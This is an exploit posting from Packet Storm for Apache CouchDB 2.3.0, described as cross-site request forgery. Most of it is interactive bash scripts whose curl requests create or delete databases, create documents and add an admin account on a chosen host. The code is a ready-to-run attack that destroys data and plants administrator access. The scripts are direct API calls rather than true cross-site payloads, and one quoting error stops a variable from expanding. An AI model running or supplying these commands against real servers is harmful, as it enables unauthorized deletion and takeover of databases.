Apache CouchDB version 2.3.0 suffers from cross site request forgery vulnerabilities providing there's a loose CORs policy.
6678d3e21c0a5997e827adc0f476c65d1375706727fd7f23aad5cecb3f28f4c0##################################################################################################################################
# Exploit Title: Apache CouchDB 2.3.0 Cross Site Request Forgery
# Date: 21.12.2018
# Exploit Author: Ozer Goker
# Vendor Homepage: http://couchdb.apache.org
# Software Link: http://couchdb.apache.org/#download
# Version: 2.3.0
##################################################################################################################################
Introduction
Apache CouchDB is open source database software that focuses on ease of use
and having a scalable architecture. It has a document-oriented NoSQL
database architecture and is implemented in the concurrency-oriented
language Erlang; it uses JSON to store data, JavaScript as its query
language using MapReduce, and HTTP for an API.
##################################################################################################################################
Bash Script for Cross Site Request Forgery
CSRF1
Create Database
echo -n "Enter IP:"
read IP
echo -n "Enter Port:"
read PORT
echo -n "Enter DB Name:"
read DB
curl -X PUT "$IP:$PORT/$DB"
##################################################################################################################################
Delete Database
echo -n "Enter IP:"
read IP
echo -n "Enter Port:"
read PORT
echo -n "Enter DB Name:"
read DB
curl -X DELETE "$IP:$PORT/$DB"
##################################################################################################################################
Create Document
echo -n "Enter IP:"
read IP
echo -n "Enter Port:"
read PORT
echo -n "Enter DB Name:"
read DB
echo -n "Enter Document Name:"
read DOC
curl -X PUT "$IP:$PORT/$DB/$DOC" --data '{"_id":"$DOC"}'
##################################################################################################################################
Create Admin
echo -n "Enter IP:"
read IP
echo -n "Enter Port:"
read PORT
echo -n "Enter Admin Username:"
read username
echo -n "Enter Admin Password:"
read password
curl -X PUT "$IP:$PORT/_node/couchdb@localhost/_config/admins/$username" -H
"content-type: application/json" --data \"$password\"
##################################################################################################################################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed